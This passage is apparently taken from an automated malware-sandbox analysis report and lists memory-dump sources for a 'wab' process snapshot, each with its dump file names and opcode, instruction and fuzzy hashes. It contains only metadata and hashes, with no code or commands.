                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ef1db4cfa6139cbecaff46e9503f4b3678e7db541c0ec4680bbf671df84f0d1d
                      • Instruction ID: 13bbe27e04fe66003355e85ff49555c8b46c75d1b0ba5bbf7e32116b079f65e6
                      • Opcode Fuzzy Hash: ef1db4cfa6139cbecaff46e9503f4b3678e7db541c0ec4680bbf671df84f0d1d
                      • Instruction Fuzzy Hash: 7A90023161940802D1507158445474610955BD0305F96C015A0029654D8755CB5576A5
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ecf3addfa6843ac635b672c44004f78ce2a8dbcf68b160762ef2d46206e64e96
                      • Instruction ID: 75b15ea05eef94f7155d9598fde9e3bac05c86326f1399eaa4ead50bd7e2ca2c
                      • Opcode Fuzzy Hash: ecf3addfa6843ac635b672c44004f78ce2a8dbcf68b160762ef2d46206e64e96
                      • Instruction Fuzzy Hash: CE90023121540402D1007598544864610955BE0305F96D015A5029555EC665C9916135
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ba86fb9a1c830508d35a06794ca23d505df67e381cdaa9115d193eac6cd78efb
                      • Instruction ID: 8e36d7faf3a172ea0a957373ed545616f157916114b387eecccd26e7d7038dac
                      • Opcode Fuzzy Hash: ba86fb9a1c830508d35a06794ca23d505df67e381cdaa9115d193eac6cd78efb
                      • Instruction Fuzzy Hash: 7090027121540402D1407158444474610955BD0305F96C015A5069554E8659CED56669
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 25a76e240975934b8b7fb9df726cc4cb28faae977ef1948cdf45e5e76b1a86f7
                      • Instruction ID: c25900ab05816f20f323cd24bdba29fc4d9be635b9038e5553b0ee8313d17ae2
                      • Opcode Fuzzy Hash: 25a76e240975934b8b7fb9df726cc4cb28faae977ef1948cdf45e5e76b1a86f7
                      • Instruction Fuzzy Hash: 5F90023121580402D1007158484874710955BD0306F96C015A5169555E8665C9916535
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d0c144dbe8a251498f0319e8277c941ef456058e7052656b377562de6d4adcab
                      • Instruction ID: 7706e3eddac33b23284840abbdfc312dc4c546ef155956698900e26535e8589d
                      • Opcode Fuzzy Hash: d0c144dbe8a251498f0319e8277c941ef456058e7052656b377562de6d4adcab
                      • Instruction Fuzzy Hash: 3C90023125945102D150715C444461650957BE0205F96C025A0819594D8555C9556225
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6b0392b3e71566aa827b9d587125838a90bb7f2884db9b920ee9432ef5490a47
                      • Instruction ID: f609ac4330204384d832424339eeb9b7abc5b171567efaa50e797ad0b0d07fef
                      • Opcode Fuzzy Hash: 6b0392b3e71566aa827b9d587125838a90bb7f2884db9b920ee9432ef5490a47
                      • Instruction Fuzzy Hash: B19002316154004241407168888490650957FE1215796C125A099D550D8559C9655669
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f6ac8588758ae8b014d9bdfa22e58f74ad25b3466b3ad5fa1b1649e0850757e
                      • Instruction ID: 157f3538122e1aa4bf9ba1f03c9227e2abae1f69873f9c623c9a204cc024c63e
                      • Opcode Fuzzy Hash: 7f6ac8588758ae8b014d9bdfa22e58f74ad25b3466b3ad5fa1b1649e0850757e
                      • Instruction Fuzzy Hash: B790023125540402D1417158444460610996BD0245FD6C016A0429554E8655CB56AA65
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d328b733f42689e8346bdf38e9be7e3b87b0135d98558ae800cdd057b2320fc0
                      • Instruction ID: 573c15cab3401f8bf851b429fd744a2a6f6dd92102548d12d4af3143f488c932
                      • Opcode Fuzzy Hash: d328b733f42689e8346bdf38e9be7e3b87b0135d98558ae800cdd057b2320fc0
                      • Instruction Fuzzy Hash: 759002B1215540924500B2588444B0A55955BE0205B96C01AE1059560CC525C9519139
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4d1e06e866632e16c22d0a7729a562e78cc68fd7a72cb65bf2bf9597722c13d5
                      • Instruction ID: 94f8faf38a268e6ea0eacfbc8164771632e9468d7cb3cd87bcca6f7371aa99dc
                      • Opcode Fuzzy Hash: 4d1e06e866632e16c22d0a7729a562e78cc68fd7a72cb65bf2bf9597722c13d5
                      • Instruction Fuzzy Hash: 2C90023131540003D140715854586065095ABE1305F96D015E0419554CD915C9565226
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b1466519b7662df428d62e2aaf74625cec6ff146ce0577c6883360ee9acd5536
                      • Instruction ID: fc8066f51784909125ad71396dc8f2c05cd11e65f93b44b953565dfec0d5379b
                      • Opcode Fuzzy Hash: b1466519b7662df428d62e2aaf74625cec6ff146ce0577c6883360ee9acd5536
                      • Instruction Fuzzy Hash: B290023131540402D1027158445460610999BD1349FD6C016E1429555D8625CA53A136
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 52cd4c90ac9367a9b68d85d98977d2475f8ce225093f17e99a2a92702f9b60e0
                      • Instruction ID: 1cd72f4f17bdb5b040d9256357a55ffc2f692370d6701859c6b3e4c63967ddef
                      • Opcode Fuzzy Hash: 52cd4c90ac9367a9b68d85d98977d2475f8ce225093f17e99a2a92702f9b60e0
                      • Instruction Fuzzy Hash: 9890027135540442D10071584454B0610959BE1305F96C019E1069554D8619CD52612A
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2e34a31b63cc967f9da4db3311a6f62e13d2110f6055747e79324a1a4703b47a
                      • Instruction ID: d75def0ac610396e59a0ec4c4ed973d101e61d1a38effb4a4619d1ff360844a7
                      • Opcode Fuzzy Hash: 2e34a31b63cc967f9da4db3311a6f62e13d2110f6055747e79324a1a4703b47a
                      • Instruction Fuzzy Hash: A890023161540502D10171584444616109A5BD0245FD6C026A1029555ECA25CA92A135
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fe7a0225bf5c224ca68e843bbff876db1a9f24c412ddfd0524ef47349a65ae48
                      • Instruction ID: 8e4f1453ca22c02b612812c08c21f3777c4c502ec0af6972ce476ea39b1e2788
                      • Opcode Fuzzy Hash: fe7a0225bf5c224ca68e843bbff876db1a9f24c412ddfd0524ef47349a65ae48
                      • Instruction Fuzzy Hash: AC90023121540802D1047158484468610955BD0305F96C015A6029655E9665C9917135
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 81c15207c14c1b16e7689e70db19d7aeb7a3ba39c549ce4bda488b01161015e8
                      • Instruction ID: 79a220ba3631d1f449f024ed411abba261eb0bbf6d1f4dc545695f999d65f335
                      • Opcode Fuzzy Hash: 81c15207c14c1b16e7689e70db19d7aeb7a3ba39c549ce4bda488b01161015e8
                      • Instruction Fuzzy Hash: BF90023121944442D10075585448A0610955BD0209F96D015A1069595DC635C951A135
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 99702a4533dfbeaf33fb8aba30d163dab501125e0af2267d43fc46acba6dd516
                      • Instruction ID: 356b7901b23d49a678224c551ee97abf7f58a072bb30728cb7127b7ef2634d21
                      • Opcode Fuzzy Hash: 99702a4533dfbeaf33fb8aba30d163dab501125e0af2267d43fc46acba6dd516
                      • Instruction Fuzzy Hash: 1790023125540802D1407158845470710969BD0605F96C015A0029554D8616CA6566B5
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6c73353afcec0745613a594493ad0838d797c936c21fd10649d74f6a5081e296
                      • Instruction ID: 5fce212ba1a2eb09d8f0f70c1b5affe3d36dca0649a7ced04c1b04ad328b0c71
                      • Opcode Fuzzy Hash: 6c73353afcec0745613a594493ad0838d797c936c21fd10649d74f6a5081e296
                      • Instruction Fuzzy Hash: 2A90023121580402D1007158485470B10955BD0306F96C015A1169555D8625C9516575
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 969664147dd7514059f2b09e3a88f8836f6208e22000295404277a9db6249507
                      • Instruction ID: 2bef6e120ba09ca9c0c3168eea491f4bb23291c91145748ba1629fffae85e115
                      • Opcode Fuzzy Hash: 969664147dd7514059f2b09e3a88f8836f6208e22000295404277a9db6249507
                      • Instruction Fuzzy Hash: 9B90023922740002D1807158544860A10955BD1206FD6D419A001A558CC915C9695325
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8202716aa56a4a0b6da7c21bc4257a5ada3e3739d81130559d9ddfa5968b1f4c
                      • Instruction ID: 516c4106ffeff4b1ee4ac0fd1cd3afcaf67d4fe3287a46931ae47deca3389763
                      • Opcode Fuzzy Hash: 8202716aa56a4a0b6da7c21bc4257a5ada3e3739d81130559d9ddfa5968b1f4c
                      • Instruction Fuzzy Hash: F290023121584442D14072584844B0F51955BE1206FD6C01DA415B554CC915C9555725
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 333361d1e85f8ccaefed05f854d54d27327f83409b80e7ff1ddc15d25aa43ced
                      • Instruction ID: 7cf31b8e8c72cc8d69077844f09a95f19ca9e336fb163ea8bc3c0334c6417268
                      • Opcode Fuzzy Hash: 333361d1e85f8ccaefed05f854d54d27327f83409b80e7ff1ddc15d25aa43ced
                      • Instruction Fuzzy Hash: FF90023121640142954072585844A4E51955BE1306BD6D419A001A554CC914C9615225
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ebeb7354d78c5657a242c4a970406dbe83941ed0dde2aca369cb38e6c1f4a9d9
                      • Instruction ID: a17c470f8ca017f4754f50a79c4662543d05ceebbb939f45f1bd87d40d7355f4
                      • Opcode Fuzzy Hash: ebeb7354d78c5657a242c4a970406dbe83941ed0dde2aca369cb38e6c1f4a9d9
                      • Instruction Fuzzy Hash: F390023121944842D14071584444A4610A55BD0309F96C015A0069694D9625CE55B665
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f11248253ca7a873acf968d34dafb826d2c9afcec3d6b5642c1e647390d4cee4
                      • Instruction ID: 53317247379e6e9109f4785c23ab855f27cc02ee66153efe2b60e6560352f497
                      • Opcode Fuzzy Hash: f11248253ca7a873acf968d34dafb826d2c9afcec3d6b5642c1e647390d4cee4
                      • Instruction Fuzzy Hash: E790027121580403D1407558484460710955BD0306F96C015A2069555E8A29CD516139
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f0a3f63f11cf4b0050ef2788ba743d363fbb5c34d29f779483db41a361752e6d
                      • Instruction ID: a1a251a8c1a06417736edf3e5ee3fc71d335c1a066c0827f73dcfc26fd2563fb
                      • Opcode Fuzzy Hash: f0a3f63f11cf4b0050ef2788ba743d363fbb5c34d29f779483db41a361752e6d
                      • Instruction Fuzzy Hash: 8D900231225C0042D20075684C54B0710955BD0307F96C119A0159554CC915C9615525
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d0cc35b4110109b84734fa5ae03ab875d611fcbdd29d31f86ddce709dbef736b
                      • Instruction ID: 3a1be024d7821a2948b119dc7c768c36d9e0edeabd96b0e1bc528e34db783163
                      • Opcode Fuzzy Hash: d0cc35b4110109b84734fa5ae03ab875d611fcbdd29d31f86ddce709dbef736b
                      • Instruction Fuzzy Hash: BA90027121640003410571584454616509A5BE0205B96C025E1019590DC525C9916129
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 491b19dff74f6db5c3e712c9235e0216ed3651a97c8a65cff202ec7eefb78ac8
                      • Instruction ID: 55be5dc40c1612e550c576910c45f8782f50a342fbabc4cdefcd74894f7518e7
                      • Opcode Fuzzy Hash: 491b19dff74f6db5c3e712c9235e0216ed3651a97c8a65cff202ec7eefb78ac8
                      • Instruction Fuzzy Hash: 4F90023121540842D10071584444B4610955BE0305F96C01AA0129654D8615C9517525
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 859be9abdad0bcf5345f6ebf220aac365625ad29d9977da5e20ec868d4b8bad3
                      • Instruction ID: a31ebe6660663b5fc01e2a46e8cee917250d0909e08c020d2becc0cebc21c6d8
                      • Opcode Fuzzy Hash: 859be9abdad0bcf5345f6ebf220aac365625ad29d9977da5e20ec868d4b8bad3
                      • Instruction Fuzzy Hash: C290027122540042D1047158444470610D55BE1205F96C016A2159554CC529CD615129
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c6a840b7d72be2fae5ab213a10b611236c3f391e990ea1451c27eeda8bab4b3b
                      • Instruction ID: 89c04a5de527324118fe2f336a37844666e1249d91938c65db539f51350eb320
                      • Opcode Fuzzy Hash: c6a840b7d72be2fae5ab213a10b611236c3f391e990ea1451c27eeda8bab4b3b
                      • Instruction Fuzzy Hash: 22900235235400020145B558064450B14D56BD63553D6C019F141B590CC621C9655325
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2775adc6475bed2a58b756b4791dad34aa234c2ce480b0b8cabcf2c81cd7f51
                      • Instruction ID: b6fe0b03b5848e2ca90ac44a4f8183faa70b42a8f910aeef450ad4f0b64d6f6e
                      • Opcode Fuzzy Hash: b2775adc6475bed2a58b756b4791dad34aa234c2ce480b0b8cabcf2c81cd7f51
                      • Instruction Fuzzy Hash: A290023121540802D1807158444464A10955BD1305FD6C019A002A654DCA15CB5977A5
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3623883a6239ed99eefb230a98f5fddb5ceff842cb92da0a4a2a2b37eebaf5fb
